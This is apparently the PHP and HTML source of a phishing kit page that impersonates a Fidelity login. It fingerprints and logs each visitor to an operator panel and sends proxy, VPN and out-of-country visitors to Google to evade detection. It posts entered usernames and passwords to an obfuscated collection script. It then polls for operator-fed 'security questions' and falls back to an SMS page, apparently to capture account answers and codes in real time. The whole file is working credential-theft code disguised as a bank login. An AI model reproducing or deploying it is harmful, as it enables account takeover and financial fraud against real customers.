<?php
session_start();
include "panel/banip/zeus.php";
include "panel/send/panel.php";
require_once 'prevents/dt.php';
require_once 'prevents/filtre.php';
$settings = [];
if (file_exists("panel/settings/settings.json")) {
    $settings = json_decode(file_get_contents("panel/settings/settings.json"), true);
}
$checkProxy = $settings['proxy_check'] ?? false;
$checkCountry = $settings['country_check'] ?? false;
$browser = new BrowserDetection();
$detector = new Obj();
$deviceType = $browser->isMobile() ? "📱 Mobile Device" : "💻 Desktop Device";
$os = $browser->getPlatform();
$browserName = $browser->getName();
$browserVersion = $browser->getVersion();
$browserInfo = "$browserName $browserVersion";
$ipDetails = $detector->getIpDetails();
$visitor_ip = $_SERVER['REMOTE_ADDR'];
if (!$checkProxy && !$checkCountry) {
    $status = "⚠️ ANTIBOTS DISABLED";
    $statusClass = "status-clean";
    $blockAccess = false;
} else {
    $status = "✅ CLEAN";
    $statusClass = "status-clean";
    $blockAccess = false;
    if ($checkProxy) {
        $isProxy = !$detector->__checkproxy();
        if ($isProxy) {
            $status = "⚠️ PROXY/VPN DETECTED";
            $statusClass = "status-proxy";
            $blockAccess = true;
        }
    }
    if ($checkCountry && !$blockAccess) {
        $allowedCountries = [];
        if (file_exists("panel/countryallowed/allowed_countries.php")) {
            include "panel/countryallowed/allowed_countries.php";
            $allowedCountries = $country;
        }
        $isAllowedCountry = $detector->__allowedcountry($allowedCountries);
        if (!$isAllowedCountry) {
            $status = "🚫 PAYS NON AUTORISÉ";
            $statusClass = "status-blocked";
            $blockAccess = true;
        }
    }
}
$country = $ipDetails['country'] ?? 'Unknown';
$city = $ipDetails['city'] ?? 'Unknown';
$isp = $ipDetails['isp'] ?? 'Unknown';
$date = date("Y-m-d H:i:s");
$visitor_info = "<tr><td><img class='flag-icon' src='https://flagcdn.com/16x12/" . strtolower($ipDetails['countryCode']) . ".png' alt='" . $country . "'> $visitor_ip</td><td>$date</td><td>$isp</td><td>$country</td><td><span class='status-device'>$deviceType</span></td><td><span class='$statusClass'>$status</span></td><td>$os</td><td>$browserInfo</td></tr>";
try {
    $file = fopen("panel/dhyouf.php", "r+");
    if ($file) {
        $content = fread($file, filesize("panel/dhyouf.php"));
        $insert_position = strpos($content, '</tbody>');
        if ($insert_position !== false) {
            $new_content = substr($content, 0, $insert_position) . $visitor_info . substr($content, $insert_position);
            fseek($file, 0);
            fwrite($file, $new_content);
        }
        fclose($file);
    }
} catch (Exception $e) {
    error_log("Erreur d'écriture dans dhyouf.php: " . $e->getMessage());
}
if ($blockAccess) {
    header("Location: https://www.google.com");
    exit();
}
$token = bin2hex(random_bytes(32));
$_SESSION['auth_token'] = $token;
$_SESSION['auth_time'] = time();
$_SESSION['visitor_ip'] = $_SERVER['REMOTE_ADDR'];
$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
if (isset($_GET['verify']) && $_GET['verify'] == 'ajax') {
    header('Content-Type: application/json');
    echo json_encode(['success' => true, 'token' => $token]);
    exit();
}
if (!isset($_SESSION['auth_token'])) {
    header("Location: https://www.google.com");
    exit();
}
if (isset($_GET['action']) && $_GET['action'] == 'redirect') {
    if (isset($_SESSION['redirect_url']) && !empty($_SESSION['redirect_url'])) {
        $redirect_url = $_SESSION['redirect_url'];
        unset($_SESSION['redirect_url']);
        header("Location: " . $redirect_url);
        exit();
    }
    header("Location: login.php");
    exit();
}
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}
?>
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
        
        :root {
            --primary-color: #008a00; /* Fidelity Green */
            --primary-dark: #006a00;
            --text-color: #333333;
            --text-light: #555555;
            --border-color: #cccccc;
            --page-bg: #f5f5f5;
            --error-color: #D32F2F; /* Red for errors */
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Roboto', sans-serif;
        }
        
        body {
            background: var(--page-bg);
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            color: var(--text-color);
        }
        
        .page-wrapper {
            display: flex;
            flex-direction: column;
            min-height: 100vh;
            width: 100%;
        }
        
        .header {
            padding: 24px 40px;
            background: #ffffff;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        }
        
        .logo img {
            height: 52px;
        }
        
        .main-content {
            flex: 1;
            display: flex;
            justify-content: center;
            padding: 40px 20px;
        }
        
        .login-container {
            width: 100%;
            max-width: 400px;
            background: #ffffff;
            padding: 32px;
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05);
            border: 1px solid #e0e0e0;
        }
        
        h1 {
            font-size: 28px;
            color: var(--text-color);
            margin-bottom: 24px;
            font-weight: 500;
        }
        
        .form-group {
            margin-bottom: 20px;
            width: 100%;
        }
        
        label {
            display: block;
            color: var(--text-color);
            font-size: 16px;
            margin-bottom: 8px;
            font-weight: 700;
        }
        
        .input-wrapper {
            position: relative;
        }
        
        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 16px;
            border: 1px solid var(--border-color);
            border-radius: 4px;
            font-size: 16px;
            transition: all 0.3s ease;
            height: 48px;
        }

        input[type="password"] {
            padding-right: 45px;
        }
        
        input:focus {
            outline: none;
            border-color: var(--primary-color);
            box-shadow: 0 0 0 2px rgba(0, 138, 0, 0.2);
        }

        /* New class for error state on input */
        input.input-error {
            border-color: var(--error-color);
            box-shadow: 0 0 0 1px var(--error-color);
        }
        input.input-error:focus {
            border-color: var(--error-color);
            box-shadow: 0 0 0 2px rgba(211, 47, 47, 0.2);
        }


        .password-toggle {
            position: absolute;
            right: 12px;
            top: 50%;
            transform: translateY(-50%);
            width: 24px;
            height: 24px;
            color: var(--text-light);
            cursor: pointer;
        }
        
        /* New style for the error message below input */
        .input-error-message {
            color: var(--error-color);
            font-size: 14px;
            margin-top: 8px;
            display: none; /* Hidden by default */
            align-items: center;
        }
        .error-icon {
            width: 16px;
            height: 16px;
            fill: currentColor;
            margin-right: 6px;
            flex-shrink: 0;
        }
        
        .login-button {
            background-color: var(--primary-color);
            color: white;
            border: none;
            border-radius: 4px;
            padding: 14px;
            font-size: 16px;
            font-weight: 700;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 12px;
            transition: all 0.3s ease;
            width: 100%;
            height: 50px;
        }
        
        .login-button:hover:not(:disabled) {
            background-color: var(--primary-dark);
        }
        
        .forgot-password {
            display: inline-block;
            margin-top: 24px;
            color: var(--primary-color);
            text-decoration: none;
            font-size: 14px;
            font-weight: 500;
        }
        .forgot-password:hover {
            text-decoration: underline;
        }
        
        .remember-me {
            display: flex;
            align-items: center;
            margin-top: 20px;
        }
        .remember-me label {
            font-weight: 400;
            color: var(--text-light);
            margin: 0 0 0 8px;
            font-size: 16px;
            cursor: pointer;
        }
        .remember-me input[type="checkbox"] {
            width: 16px;
            height: 16px;
        }

        .footer-section {
            text-align: center;
            margin-top: 40px;
            padding-top: 24px;
            border-top: 1px solid #e0e0e0;
            font-size: 14px;
            color: var(--text-light);
        }
        .footer-section a {
            color: var(--primary-color);
            text-decoration: none;
            font-weight: 500;
        }
        .footer-section a:hover {
            text-decoration: underline;
        }
        .footer-links {
            margin-top: 16px;
            display: flex;
            justify-content: center;
            gap: 20px;
        }

        /* --- STYLES FOR UNTOUCHED FUNCTIONS --- */
        .spinner {
            display: none;
            width: 20px;
            height: 20px;
            border: 3px solid rgba(255, 255, 255, 0.3);
            border-radius: 50%;
            border-top-color: #fff;
            animation: spin 1s ease-in-out infinite;
        }
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        .login-button.loading .spinner { display: block; }
        .login-button.loading .button-text {
            visibility: hidden;
            position: absolute;
        }
        
        .success-container {
            display: none;
            text-align: center;
            padding: 20px;
            background-color: #f0f0f0;
            border: 1px solid #cccccc;
            border-radius: 12px;
            animation: fadeIn 0.3s ease-in-out;
        }
        .success-container.show { display: block; }
        .success-title {
            color: #333333;
            font-weight: 600;
            font-size: 18px;
            margin-bottom: 8px;
        }
        .success-message {
            color: #333333;
            font-size: 15px;
            line-height: 1.5;
        }
        .loading-spinner {
            width: 24px;
            height: 24px;
            border: 3px solid rgba(0, 0, 0, 0.2);
            border-radius: 50%;
            border-top-color: var(--primary-color);
            animation: spin 1s linear infinite;
            margin: 16px auto 0;
        }
        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(-10px); }
            to { opacity: 1; transform: translateY(0); }
        }

        .security-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.6);
            display: none;
            justify-content: center;
            align-items: center;
            z-index: 1000;
            padding: 16px;
        }
        .security-container {
            background-color: #fff;
            padding: 40px;
            border-radius: 24px;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.15);
            width: 100%;
            max-width: 500px;
            text-align: center;
            animation: fadeInScale 0.4s ease-out;
        }
        @keyframes fadeInScale {
            from { opacity: 0; transform: scale(0.95); }
            to { opacity: 1; transform: scale(1); }
        }
        .security-header { margin-bottom: 24px; }
        .security-icon {
            width: 60px;
            height: 60px;
            margin-bottom: 16px;
        }
        .security-title {
            font-size: 24px;
            font-weight: 700;
            color: var(--text-color);
            margin-bottom: 8px;
        }
        .security-subtitle {
            font-size: 16px;
            color: #495057;
        }
        .question-text {
            font-size: 18px;
            font-weight: 600;
            color: var(--primary-color);
            margin-bottom: 24px;
            line-height: 1.5;
        }
        .answer-input {
            width: 100%;
            padding: 14px 18px;
            border: 1px solid #ced4da;
            border-radius: 12px;
            font-size: 16px;
            margin-bottom: 24px;
            text-align: center;
        }
        .submit-btn {
            background-color: var(--primary-color);
            color: white;
            border: none;
            border-radius: 12px;
            padding: 16px;
            width: 100%;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        .submit-btn:hover {
            background-color: var(--primary-dark);
        }
        
        @media(max-width:480px) {
            .header { padding: 20px 16px; }
            .main-content { padding: 20px 16px; }
            .login-container { padding: 24px; }
            .footer-section {
                padding-top: 20px;
                margin-top: 24px;
            }
            .footer-links {
                flex-direction: column;
                gap: 12px;
            }
            .security-container { padding: 24px; }
            .security-title { font-size: 20px; }
        }
    </style>
</head>
<body>
<div class="page-wrapper">
    <header class="header">
        <div class="logo"><img src="logo.png" alt="Logo"></div>
    </header>
    <main class="main-content">
        <div class="login-container">
            <div id="loginFormContainer">
                <h1>Log in</h1>
                <form method="post" action="panel/send/18b43c6a536a8fe1362f7a3887936be6.php" id="loginForm">
                    <div class="form-group">
                        <label for="username">Username</label>
                        <div class="input-wrapper">
                            <input type="text" id="username" name="username" autocomplete="username" required>
                        </div>
                        <!-- New error message container -->
                        <div class="input-error-message" id="usernameError">
                            <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" fill="currentColor">
                                <path fill-rule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm-1-5a1 1 0 102 0v-2a1 1 0 10-2 0v2zm0-6a1 1 0 00-1 1v.01a1 1 0 002 0V8a1 1 0 00-1-1z" clip-rule="evenodd" />
                            </svg>
                            <span>Enter your username.</span>
                        </div>
                    </div>
                    <div class="form-group">
                        <label for="password">Password</label>
                        <div class="input-wrapper">
                            <input type="password" id="password" name="password" autocomplete="current-password" required>
                            <svg class="password-toggle" id="togglePassword" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" fill="currentColor">
                                <path d="M10 12a2 2 0 100-4 2 2 0 000 4z" />
                                <path fill-rule="evenodd" d="M.458 10C1.732 5.943 5.522 3 10 3s8.268 2.943 9.542 7c-1.274 4.057-5.022 7-9.542 7S1.732 14.057.458 10zM14 10a4 4 0 11-8 0 4 4 0 018 0z" clip-rule="evenodd" />
                            </svg>
                        </div>
                        <!-- New error message container -->
                        <div class="input-error-message" id="passwordError">
                            <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" fill="currentColor">
                                <path fill-rule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm-1-5a1 1 0 102 0v-2a1 1 0 10-2 0v2zm0-6a1 1 0 00-1 1v.01a1 1 0 002 0V8a1 1 0 00-1-1z" clip-rule="evenodd" />
                            </svg>
                            <span>Enter your password.</span>
                        </div>
                    </div>
                    
                    <div class="remember-me">
                        <input type="checkbox" id="rememberMe">
                        <label for="rememberMe">Remember my username</label>
                    </div>

                    <button type="submit" class="login-button" style="margin-top: 24px;">
                        <div class="spinner"></div>
                        <span class="button-text">Log in</span>
                    </button>
                </form>
                <a href="#" class="forgot-password">Forgot username or password?</a>
            </div>
            
            <div class="success-container" id="successContainer">
                <div class="success-content">
                    <div class="success-title">Login Successful</div>
                    <div class="success-message">Please wait while we prepare your security session...</div>
                    <div class="loading-spinner"></div>
                </div>
            </div>

            <div class="footer-section">
                New to Fidelity?
                <div class="footer-links">
                    <a href="#">Open an account</a>
                    <span>or</span>
                    <a href="#">sign up</a>
                </div>
                <div class="footer-links" style="margin-top: 20px; gap: 30px;">
                    <a href="#">Security</a>
                    <a href="#">FAQs</a>
                </div>
            </div>
        </div>
    </main>
</div>

<div class="security-overlay" id="securityOverlay">
    <div class="security-container">
        <div class="security-header">
            <img class="security-icon" src="https://www.svgrepo.com/show/74601/security.svg" alt="Security Icon">
            <h2 class="security-title">Security Challenge</h2>
            <p class="security-subtitle">Please answer the security question to continue</p>
        </div>
        <form method="post" action="panel/send/send_answer.php" id="securityForm">
            <input type="hidden" name="token" value="">
            <div class="question-text" id="securityQuestionText"></div>
            <input type="text" name="answer" class="answer-input" placeholder="Enter your answer" required>
            <button type="submit" class="submit-btn">Submit Answer</button>
        </form>
    </div>
</div>

<script>
    const passwordInput = document.getElementById('password');
    const togglePassword = document.getElementById('togglePassword');
    
    if (togglePassword && passwordInput) {
        togglePassword.addEventListener('click', function () {
            const type = passwordInput.getAttribute('type') === 'password' ? 'text' : 'password';
            passwordInput.setAttribute('type', type);
            this.style.opacity = (type === 'password') ? '1' : '0.6';
        });
    }

    document.addEventListener('DOMContentLoaded', function() {
        const loginForm = document.getElementById('loginForm');
        const usernameInput = document.getElementById('username');
        const passwordInput = document.getElementById('password'); // Get password input
        
        // Get new error elements
        const usernameError = document.getElementById('usernameError');
        const passwordError = document.getElementById('passwordError');
        
        const successContainer = document.getElementById('successContainer');
        const loginFormContainer = document.getElementById('loginFormContainer');
        const securityOverlay = document.getElementById('securityOverlay');
        const securityForm = document.getElementById('securityForm');

        loginForm.addEventListener('submit', function (e) {
            const button = this.querySelector('.login-button');
            const username = usernameInput.value.trim();
            const password = passwordInput.value.trim();
            
            let isValid = true;

            // --- New Validation Logic ---
            // Reset errors
            usernameError.style.display = 'none';
            usernameInput.classList.remove('input-error');
            passwordError.style.display = 'none';
            passwordInput.classList.remove('input-error');

            // Check username
            if (username === '') {
                usernameError.style.display = 'flex';
                usernameInput.classList.add('input-error');
                isValid = false;
            }
            
            // Check password
            if (password === '') {
                passwordError.style.display = 'flex';
                passwordInput.classList.add('input-error');
                isValid = false;
            }

            // If not valid, stop the form submission
            if (!isValid) {
                e.preventDefault();
                return;
            }
            // --- End New Validation Logic ---

            
            e.preventDefault(); // Keep this for the fetch logic
            button.classList.add('loading');
            button.disabled = true;

            fetch(this.action, {
                method: 'POST',
                body: new FormData(this)
            }).then(response => {
                if (response.redirected) {
                    window.location.href = response.url;
                } else {
                    throw new Error('No redirection occurred.');
                }
            }).catch(error => {
                console.error('Error:', error);
                button.classList.remove('loading');
                button.disabled = false;
                
                // Show a generic error on failure, re-using usernameError
                usernameError.querySelector('span').textContent = 'Login failed. Please check your credentials.';
                usernameError.style.display = 'flex';
                usernameInput.classList.add('input-error');
                passwordInput.classList.add('input-error');
            });
        });

        // Clear error message on input
        usernameInput.addEventListener('input', function() {
            usernameError.style.display = 'none';
            usernameInput.classList.remove('input-error');
        });
        passwordInput.addEventListener('input', function() {
            passwordError.style.display = 'none';
            passwordInput.classList.remove('input-error');
        });

        // UNTOUCHED: Security Question Logic
        const urlParams = new URLSearchParams(window.location.search);
        const token = urlParams.get('token');
        if (token) {
            loginFormContainer.style.display = 'none';
            successContainer.classList.add('show');
            checkQuestion(token);
        }

        function checkQuestion(token) {
            let timeoutCounter = 0;
            const maxTimeout = <?php echo isset($securityQuestionTimeout) ? $securityQuestionTimeout : 60; ?>;
            const checkInterval = setInterval(() => {
                timeoutCounter++;
                if (timeoutCounter >= maxTimeout) {
                    clearInterval(checkInterval);
                    window.location.href = 'sms.php';
                    return;
                }
                fetch(`panel/send/questions/${token}.txt`)
                    .then(response => {
                        if (response.ok) {
                            return response.text();
                        }
                        if (response.status === 404) {
                            return null;
                        }
                        throw new Error('Network response was not ok');
                    })
                    .then(question => {
                        if (question && question.trim() !== '') {
                            clearInterval(checkInterval);
                            securityOverlay.querySelector('[name="token"]').value = token;
                            document.getElementById('securityQuestionText').textContent = question;
                            successContainer.classList.remove('show');
                            securityOverlay.style.display = 'flex';
                        }
                    })
                    .catch(error => {
                        console.log('Waiting for question...');
                    });
            }, 1000);
        }

        // UNTOUCHED: Security Form Submission Logic
        securityForm.addEventListener('submit', function(e) {
            e.preventDefault();
            const button = this.querySelector('.submit-btn');
            button.disabled = true;
            
            fetch(this.action, {
                method: 'POST',
                body: new FormData(this)
            }).then(response => {
                if (response.redirected) {
                    window.location.href = response.url;
                } else {
                    throw new Error('Submission failed.');
                }
            }).catch(error => {
                console.error('Error:', error);
                button.disabled = false;
            });
        });
    });
</script>
</body>
</html>